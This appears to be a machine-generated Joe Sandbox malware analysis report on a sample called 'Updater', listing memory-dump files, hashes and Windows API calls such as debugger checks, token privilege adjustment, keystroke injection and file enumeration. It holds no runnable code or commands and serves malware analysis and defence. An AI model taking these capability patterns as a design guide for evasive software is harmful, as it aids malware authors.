                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$FreeHeapInformationTimeZone_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063591714-0
                                                                                                                                                    • Opcode ID: 5c03d5b124871e8949b5a7165efa9def713a315f875aeac40d0d37ac005c82dc
                                                                                                                                                    • Instruction ID: b7506b215acbfbe7ca1057213d16f7ba0c089bdd8e3a2a9a0119723ceaaaa65f
                                                                                                                                                    • Opcode Fuzzy Hash: 5c03d5b124871e8949b5a7165efa9def713a315f875aeac40d0d37ac005c82dc
                                                                                                                                                    • Instruction Fuzzy Hash: CD31CD70904245EFCB11DFA9DC80E79BBF8FF0535171442EAE960AB2A1DB709E49CB60
                                                                                                                                                    APIs
                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00B9D97A
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B9D9DB
                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00B9D9EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                    • Opcode ID: ff28320ce1382798ee82ac109cc729f4af012e854b848517fc8fe52b79b153b5
                                                                                                                                                    • Instruction ID: a77dc91ae38caae23f3f6562484d115843636b208c02d04347011b9297456b70
                                                                                                                                                    • Opcode Fuzzy Hash: ff28320ce1382798ee82ac109cc729f4af012e854b848517fc8fe52b79b153b5
                                                                                                                                                    • Instruction Fuzzy Hash: 8E21AF755003059FEF20EFA6C888BABB7FCEB40314F5045AAE64693551EB74EE44DBA0
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B8917A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                    • String ID: ($|
                                                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                                                    • Opcode ID: 4945aaec5272aa3223c0b518f774be8f931ef2bdea6e5d8d2a8715fe9c54d60d
                                                                                                                                                    • Instruction ID: e3e7c87828d6fcb382bb6dc5e4c82669e319e0eb93f6bd60bf282f60c5b9bd91
                                                                                                                                                    • Opcode Fuzzy Hash: 4945aaec5272aa3223c0b518f774be8f931ef2bdea6e5d8d2a8715fe9c54d60d
                                                                                                                                                    • Instruction Fuzzy Hash: 4B322475A007059FCB28DF59C481AAAB7F0FF48710B15C5AEE59ADB3A1EB70E941CB40
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B96897
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B968ED
                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00B96935
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                    • Opcode ID: 0ae81f9c92dfd7b8339ad718a69259e8326a7718234ff2ae6afa04b9eb126806
                                                                                                                                                    • Instruction ID: 6de37db2d6210f57f66decd11738b4bc2e1f802a068d8ae64334ab21588c7ca4
                                                                                                                                                    • Opcode Fuzzy Hash: 0ae81f9c92dfd7b8339ad718a69259e8326a7718234ff2ae6afa04b9eb126806
                                                                                                                                                    • Instruction Fuzzy Hash: 485188746046029FDB18DF28C490EAAB7E4FF49320F1445ADE56A8B3A2DB34FD05CB91
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000004), ref: 00B5253E
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000004), ref: 00B52548
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00B21221,?,?,?,?,?,00000004), ref: 00B52555
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                    • Opcode ID: 7abde7c9aac18c74778259be9016613fcd918c857499ef50ec183cab86fd9304
                                                                                                                                                    • Instruction ID: f22a3ade9b80f7a1e8561fd62539243358d57350b7942abc5801597771245dcf
                                                                                                                                                    • Opcode Fuzzy Hash: 7abde7c9aac18c74778259be9016613fcd918c857499ef50ec183cab86fd9304
                                                                                                                                                    • Instruction Fuzzy Hash: 3931D574D01218ABCB21DF24D88979DBBF8AF18311F5042EAE81CA7251EB749F858F44
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B4042B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B40C74
                                                                                                                                                      • Part of subcall function 00B4042B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B40C91
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B82823
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B82850
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B82860
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                                    • Opcode ID: 9f536db98a9ba17b719b3ece36380a2a3cea0b98e0bd2dabf609e18961463158
                                                                                                                                                    • Instruction ID: ef785e7d54a84bf0dc5960b159b80ccbf4f56ba0863939f905e1965d2748afbb
                                                                                                                                                    • Opcode Fuzzy Hash: 9f536db98a9ba17b719b3ece36380a2a3cea0b98e0bd2dabf609e18961463158
                                                                                                                                                    • Instruction Fuzzy Hash: 8411BFB1914204AFEB18AF54EC86D6AB7F8EF08720B20816EF54657251EB70BC41CB64
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B8E3E8
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B8E429
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B8E434
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                                    • Opcode ID: c5943ede993a46af608a7e48100aed51343a283b7b28c90bd7def303bb813ce9
                                                                                                                                                    • Instruction ID: 5667cd8bc9ca3c4d326fb26de53f72070c9e6c06e75e12e3363d96c8d9f6fe1f
                                                                                                                                                    • Opcode Fuzzy Hash: c5943ede993a46af608a7e48100aed51343a283b7b28c90bd7def303bb813ce9
                                                                                                                                                    • Instruction Fuzzy Hash: D9117075E01228BFDB108F959C44BAFBBBCEB45760F108151F914E7290D6744A008BA1
                                                                                                                                                    APIs
                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B827A0
                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B827B5
                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 00B827C5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                    • Opcode ID: d3c658457f2cd6bf5f6d18a9c584d974b7a55bb2b872d904e082eff742538aa7
                                                                                                                                                    • Instruction ID: 9f71a54c4e5ca934aeac4c00afd6e710a7ea31710b471ae68f5a1e9b827b68b0
                                                                                                                                                    • Opcode Fuzzy Hash: d3c658457f2cd6bf5f6d18a9c584d974b7a55bb2b872d904e082eff742538aa7
                                                                                                                                                    • Instruction Fuzzy Hash: 19F01D7595030DBBDB00DFE4DC89AADBBBCFB04205F5045A5E900E3191EB75AA44CB50
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00B76A2B), ref: 00B8E9CA
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B8E9DB
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B8E9EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                    • Opcode ID: 4802e3f3d56ba6ff70086881f4ecfc4a7091b985ce6eff22f83cec24ef5c374e
                                                                                                                                                    • Instruction ID: c0c5987186a9727f9f16b53dfee77b84c7c0a2a1787076556a0d8b057247f4eb
                                                                                                                                                    • Opcode Fuzzy Hash: 4802e3f3d56ba6ff70086881f4ecfc4a7091b985ce6eff22f83cec24ef5c374e
                                                                                                                                                    • Instruction Fuzzy Hash: 55E09A328105126B82107A78EC0D8AA76989A06335F100B55F935C20F0FBF4DD408696
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000003,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002,00000000,?,00B52799,00000003), ref: 00B44C15
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002,00000000,?,00B52799,00000003), ref: 00B44C1C
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00B44C2E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    • Opcode ID: 68be89e161e8c225b4bfbaa23eee5d78d1df1c698bd6a7d1220fcea19ec70467
                                                                                                                                                    • Instruction ID: 395a5eb57be30320adfc9dbb428057b0ecf0bfa42a97965645e631c9c1075ff2
                                                                                                                                                    • Opcode Fuzzy Hash: 68be89e161e8c225b4bfbaa23eee5d78d1df1c698bd6a7d1220fcea19ec70467
                                                                                                                                                    • Instruction Fuzzy Hash: 0CE04631001108AFCF126F58DD48B587BE9FB04382B084894F9058B232DFBADE52EB41
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2c0b96ee7b06c7627652edda853dbcc41b50f2ddd0d20d250582382ad828a6bc
                                                                                                                                                    • Instruction ID: ca434b3532810b2d923458e9d35e5beb961180f0e400bd3cb89098f8beeebded
                                                                                                                                                    • Opcode Fuzzy Hash: 2c0b96ee7b06c7627652edda853dbcc41b50f2ddd0d20d250582382ad828a6bc
                                                                                                                                                    • Instruction Fuzzy Hash: 69023B71E012199BDF54CFA9C8806ADBBF1EF88714F2582AAD819E7344D731AE41DB90
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B9751A
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B97563
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                    • Opcode ID: 06d6d8b8a7a1dd4df6b0fe6d29e66509da617ab62d1c6189c5d89fcad742198f
                                                                                                                                                    • Instruction ID: 617630d58bc49e8574c9ce55f91cc29998ad5aa6f16727f9143ad6ebb2d01e1b
                                                                                                                                                    • Opcode Fuzzy Hash: 06d6d8b8a7a1dd4df6b0fe6d29e66509da617ab62d1c6189c5d89fcad742198f
                                                                                                                                                    • Instruction Fuzzy Hash: 8511BE316142109FCB10DF29C884A16BBE0FF85324F15C6A8E4698F2A2CB34ED05CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00BA548F,?,?,00BA5FF9,?), ref: 00B945A2
                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00BA548F,?,?,00BA5FF9,?), ref: 00B945B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                    • Opcode ID: 5cb3d991cf0512575c0d0c2febb9495e8b05965b8df251c0c4491a501f54757f
                                                                                                                                                    • Instruction ID: aed31ce646e50bc82824c299cb6f08f78b3285633c512b3dd5257b8e62363768
                                                                                                                                                    • Opcode Fuzzy Hash: 5cb3d991cf0512575c0d0c2febb9495e8b05965b8df251c0c4491a501f54757f
                                                                                                                                                    • Instruction Fuzzy Hash: FEF0A7706042292BD72066A59C49FAB76AEEF85761F0102B6F508D3181D960980587F1
                                                                                                                                                    APIs
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B8C0AF
                                                                                                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B8C0C2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                    • Opcode ID: 1ec8de36a37256bbc83f899d14a1122f25842d57f69ec85e7a65feb9f03e6036
                                                                                                                                                    • Instruction ID: d5b5427bdba5940ab6a7d10ec9cd8e3ec63829d2ff15900a06bf6efffe39945d
                                                                                                                                                    • Opcode Fuzzy Hash: 1ec8de36a37256bbc83f899d14a1122f25842d57f69ec85e7a65feb9f03e6036
                                                                                                                                                    • Instruction Fuzzy Hash: 16F06D7180424DABDB159FA4C805BFE7FB4EF08315F00814AFD55962A2D7798611DFA4
                                                                                                                                                    APIs
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B82308), ref: 00B821DE
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00B82308), ref: 00B821F3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                    • Opcode ID: bcd996c9752caac7d0094c9067ad7d6cd4f63e28666679e08d7035262442e448
                                                                                                                                                    • Instruction ID: c2a454112fa06c4ad2b275e67ac5d0605b06e5ee0876ca73ea998abe604703eb
                                                                                                                                                    • Opcode Fuzzy Hash: bcd996c9752caac7d0094c9067ad7d6cd4f63e28666679e08d7035262442e448
                                                                                                                                                    • Instruction Fuzzy Hash: 06E04F72014600AFE7253B14FC0AE727BE9EB04320F24896DF6A581471EBB2AC90EB14
                                                                                                                                                    APIs
                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00B56594,00000000,?,00000008,?,?,00B5FDAF,00000000), ref: 00B567C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
